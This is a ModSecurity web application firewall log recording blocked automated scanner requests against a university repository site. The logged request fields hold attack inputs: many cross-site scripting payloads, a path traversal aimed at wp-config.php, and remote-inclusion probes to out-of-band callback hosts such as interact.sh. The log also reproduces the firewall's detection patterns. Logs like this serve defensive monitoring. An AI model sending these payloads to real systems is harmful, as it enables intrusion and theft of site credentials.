[Tue Aug 29 11:51:35.655776 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAm7nAQAAAAE"]
[Tue Aug 29 11:51:39.602539 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnd2-YAAAAI"]
[Tue Aug 29 11:51:40.879934 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAni@6sAAAAU"]
[Tue Aug 29 11:51:42.609279 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnGkKcAAAAR"]
[Tue Aug 29 11:51:44.556702 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnVEekAAAAB"]
[Tue Aug 29 11:51:45.555722 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnHQhoAAAAT"]
[Tue Aug 29 11:51:47.601456 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnIljoAAAAV"]
[Tue Aug 29 11:51:48.615263 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAn0GW4AAAAa"]
[Tue Aug 29 11:51:48.625756 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnd3BEAAAAI"]
[Tue Aug 29 11:51:50.682058 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAn0GXYAAAAa"]
[Tue Aug 29 11:51:51.613481 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnqj8sAAAAC"]
[Tue Aug 29 11:51:52.539986 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15aMCo-f0AAAlUlmoAAAA0"]
[Tue Aug 29 11:51:53.903459 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAn0GYYAAAAa"]
[Tue Aug 29 11:51:53.925170 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn0GYcAAAAa"]
[Tue Aug 29 11:51:55.815984 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAni@80AAAAU"]
[Tue Aug 29 11:51:55.963496 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnmT40AAAAd"]
[Tue Aug 29 11:51:56.591494 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAn0GY8AAAAa"]
[Tue Aug 29 11:51:57.560891 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAm@51EAAAAH"]
[Tue Aug 29 11:51:58.574303 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnGkMkAAAAR"]
[Tue Aug 29 11:51:59.569652 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAm80SEAAAAF"]
[Tue Aug 29 11:51:59.572859 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAm7nEkAAAAE"]
[Tue Aug 29 11:52:01.577081 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnIlmwAAAAV"]
[Tue Aug 29 11:52:02.564985 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAlUloUAAAA0"]
[Tue Aug 29 11:52:02.800485 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm@52IAAAAH"]
[Tue Aug 29 11:52:02.825430 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAm@52MAAAAH"]
[Tue Aug 29 11:52:02.825517 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlUlooAAAA0"]
[Tue Aug 29 11:52:04.909635 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAjdQZsAAAAZ"]
[Tue Aug 29 11:52:04.931257 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0xjwmt3wx8y1xg.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0xjwmt3wx8y1xg.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAhoHTkAAAAl"]
